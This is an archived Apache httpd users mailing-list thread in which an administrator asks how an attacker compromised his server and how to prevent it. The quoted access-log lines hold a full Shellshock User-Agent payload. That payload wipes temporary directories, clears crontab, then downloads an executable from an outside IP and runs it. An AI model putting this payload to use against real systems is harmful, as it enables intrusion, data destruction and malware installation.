httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Victor Sterpu <vic...@casnt.ro>
Subject Re: [users@httpd] Security question
Date Fri, 03 Jul 2015 06:16:27 GMT
"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:
> I guess that the 200 comes from the fact that apache simply delivered 
> the /index.html page.
> Or did you find that "sc.gif" was transferred and executed?
> Kurt Bremser
> AMOS Austria
> Newton was wrong. There is no gravity. The Earth sucks.
> ------------------------------------------------------------------------
> *Von:* Victor Sterpu [victor@casnt.ro]
> *Gesendet:* Donnerstag, 2. Juli 2015 14:29
> *An:* users@httpd.apache.org
> *Betreff:* **SPAM?** Re: [users@httpd] Security question [wd-vc]
>
> In the end the attack was succesfull. Log show the last command:
> 62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 
> "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: 
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm 
> -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; 
> crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif 
> print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl 
> -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> But I don't know how he launched this script.
> How can I prevent this?
> I was hoping the server would execute only local scripts, is there 
> something I can do to allow only local scripts to be executed?
>
>
> On 02.07.2015 15:13, Yehuda Katz wrote:
>>
>> It is an attempt to exploit a specific configuration. By the fact 
>> that apache returned a 404 (the log line says so), you can see that 
>> attempt was not successful.
>>
>> - Y
>>
>> Sent from a gizmo with a very small keyboard and hyperactive 
>> autocorrect.
>>
>> On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro 
>> <mailto:victor@casnt.ro>> wrote:
>>
>>     Hello
>>
>>     A hacker attacked a apache2 web server by HTTP injection.
>>     The log show what he has done:
>>     62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET
>>     /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() {
>>     :;};/usr/bin/perl -e 'print \"Content-Type:
>>     text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
>>     ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf
>>     /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl
>>     lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget
>>     http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ;
>>     chmod +x sc.gif ; nohup ./sc.gif & \");'"
>>
>>     How can I prevent this in the future and how can I reproduce?
>>     I tried to reproduce but is not clear how he launched this
>>     command and I want to know so I can test my vulnerabilities in
>>     the future.
>>     The path "/phppath/cgi_wrapper" doesn't exist at all.
>>
>>     Thank you
>>
>>     ---------------------------------------------------------------------
>>     To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>     <mailto:users-unsubscribe@httpd.apache.org>
>>     For additional commands, e-mail: users-help@httpd.apache.org
>>     <mailto:users-help@httpd.apache.org>
>>
>
>
> AMOS Austria GmbH
> 1130 Wien, Hietzinger Kai 101-105
> FN 365014k, Handelsgericht Wien
> UID: ATU 66614737
>
> http://www.allianz.at
>
> ********************************************************
> Dieses E-Mail und allfaellig daran angeschlossene Anhaenge
> enthalten Informationen, die vertraulich und
> ausschliesslich fuer den (die) bezeichneten Adressaten
> bestimmt sind.
> Wenn Sie nicht der genannte Adressat sind, darf dieses
> E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen
> Personen zugaenglich gemacht noch in anderer Weise
> verwertet werden.
> Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
> wir Sie, dieses E-Mail und saemtliche angeschlossene
> Anhaenge zu loeschen.
>
> Please note: This email and any files transmitted with it is
> intended only for the named recipients and may contain
> confidential and/or privileged information. If you are not the
> intended recipient, please do not read, copy, use or disclose
> the contents of this communication to others and notify the
> sender immediately. Then please delete the email and any
> copies of it. Thank you.
> ******************************************************** 


Mime
View raw message